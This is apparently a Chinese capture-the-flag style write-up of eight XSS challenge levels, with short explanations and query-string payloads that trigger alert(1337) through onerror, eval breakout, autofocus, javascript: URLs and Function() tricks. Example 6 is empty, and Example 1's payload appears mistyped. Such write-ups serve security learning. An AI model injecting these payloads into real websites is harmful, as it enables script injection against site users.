例1

本題通過get接收并傳遞參數(shù)，所有參數(shù)不經(jīng)過過濾直接放入h2標(biāo)簽里面。

要求

1.需要頁面彈出1337
2.不能與用戶交互

官方認(rèn)為innerHTML中script標(biāo)簽不安全，所以將其禁用，但只禁用了此標(biāo)簽，所以我們可以使用其它標(biāo)簽來進(jìn)行彈窗。

這里我們可以直接使用img標(biāo)簽。

<img src = 1 onerror ="alert=1337">

例2

代碼解析

1.當(dāng)給jeff傳值時顯示所傳值，無值時顯示JEFFF
2.eval中將Ma name $(jeff)賦值給ma
3.將ma放入h2標(biāo)簽下
setTimeout 1000 表示在一秒后執(zhí)行一次。

方法

由于maname使用了innerText屬性，所以傳遞到maname的內(nèi)容均為文本，無法執(zhí)行代碼，因此我們就可以將eval中的代碼閉合來執(zhí)行我們的惡意代碼。

?jeff=1";alert(1337);"

例3

?wey=aaa"onfocus = alert(1337) autofocus="

例4

?ricardo=javascript:alert(1337)

例5

?markassbrownlee=<img%20src=1%20onerror=location="javascript:alert%25281337%2529">

例6

例7

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

例8

?boomer=<a%20id=ok%20href="tel:alert(1337)">